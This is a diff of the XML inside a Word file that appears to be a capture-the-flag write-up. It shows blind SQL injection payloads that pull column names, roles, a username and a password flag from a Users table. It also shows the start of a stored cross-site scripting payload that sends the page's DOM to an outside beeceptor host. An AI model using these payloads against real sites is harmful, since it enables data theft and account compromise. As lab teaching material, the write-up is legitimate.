               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -10814,9 +11116,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> where </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t>,1,</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -10824,9 +11125,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>3</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -10834,7 +11134,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>='Users'</w:t>
+              <w:t>)=BINARY '</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10843,75 +11143,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>column_name</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>,1,</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>)=BINARY '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
               <w:t>api</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -10944,147 +11177,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>column_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>information_schema.columns</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> where </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">='Users' having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">(column_name,1,2)=BINARY 'id' and </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>column_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&lt;&gt;'</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>api</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL, column_name from information_schema.columns where table_name='Users' having substr(column_name,1,2)=BINARY 'id' and column_name&lt;&gt;'api' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11171,21 +11264,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>"</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>api</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>", "id", "password", "probation", "</w:t>
+              <w:t>"api", "id", "password", "probation", "</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11295,9 +11374,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
+              <w:t xml:space="preserve">' union select NULL,NULL, </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -11305,9 +11383,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t>roles</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -11315,7 +11392,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
+              <w:t xml:space="preserve"> from </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11324,7 +11401,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>roles</w:t>
+              <w:t>Users</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11333,45 +11410,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>Users</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
+              <w:t xml:space="preserve"> having substr(</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11451,47 +11490,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, roles from Users having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(roles,1,8)=BINARY 'HR admin' and roles&lt;&gt;'user' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL, roles from Users having substr(roles,1,8)=BINARY 'HR admin' and roles&lt;&gt;'user' limit 1 --+</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11624,10 +11623,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
+              <w:t>' union select NULL,roles,username from Users having</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -11635,9 +11632,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>NULL,roles</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -11645,9 +11641,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>,username</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>substr(username,1,</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -11655,7 +11650,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> from Users having</w:t>
+              <w:t>10</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11664,9 +11659,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t>)=BINARY '</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -11674,47 +11668,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(username,1,</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>10</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>)=BINARY '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
               <w:t>prodigysml</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -11793,10 +11748,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
+              <w:t xml:space="preserve">' union select NULL,username,password from Users having substr(password,1,32)=BINARY 'FLAG{Wear_some_glasses_minions!}' and </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -11804,97 +11757,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>NULL,username</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>,password</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> from Users having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(password,1,32)=BINARY 'FLAG{</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>Wear_some_glasses_minions</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">!}' and </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>username=BINARY '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>prodigysml</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>' limit 1 --+</w:t>
+              <w:t>username=BINARY 'prodigysml' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11922,14 +11786,12 @@
               </w:rPr>
               <w:t>eaks out the password of “</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>prodigysml</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
@@ -11946,21 +11808,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>FLAG{</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>Wear_some_glasses_minions</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>!}</w:t>
+              <w:t>FLAG{Wear_some_glasses_minions!}</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11997,7 +11845,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId14" cstate="print">
+                          <a:blip r:embed="rId18" cstate="print">
                             <a:extLst>
                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -12121,21 +11969,12 @@
         </w:rPr>
         <w:t>`</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>py</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sqli.py</w:t>
+        <w:t>py sqli.py</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12270,6 +12109,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:bookmarkStart w:id="50" w:name="_Section2_–_stored"/>
+      <w:bookmarkStart w:id="51" w:name="_Toc71393759"/>
       <w:bookmarkEnd w:id="50"/>
       <w:r>
         <w:rPr>
@@ -12286,6 +12126,7 @@
       <w:r>
         <w:t>2 – stored cross-site scripting exploitation walkthrough</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="51"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12294,14 +12135,16 @@
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="51" w:name="_Exploitation_1"/>
-      <w:bookmarkEnd w:id="51"/>
+      <w:bookmarkStart w:id="52" w:name="_Exploitation_1"/>
+      <w:bookmarkStart w:id="53" w:name="_Toc71393760"/>
+      <w:bookmarkEnd w:id="52"/>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
         <w:t>Exploitation 1</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="53"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12486,20 +12329,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  var serializer = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
+              <w:t xml:space="preserve">  var serializer = new XMLSerializer();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>XMLSerializer</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -12507,38 +12348,37 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
+              <w:t xml:space="preserve">  var xhttp = new XMLHttpRequest();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            </w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
+              <w:t xml:space="preserve">  xhttp.open("POST", "https://hermes.free.beeceptor.com");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  var </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -12546,20 +12386,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xhttp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
+              <w:t xml:space="preserve">  xhttp.send(</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -12567,19 +12405,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
+              <w:t xml:space="preserve">    "dom=" + serializer.serializeToString(document) +</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
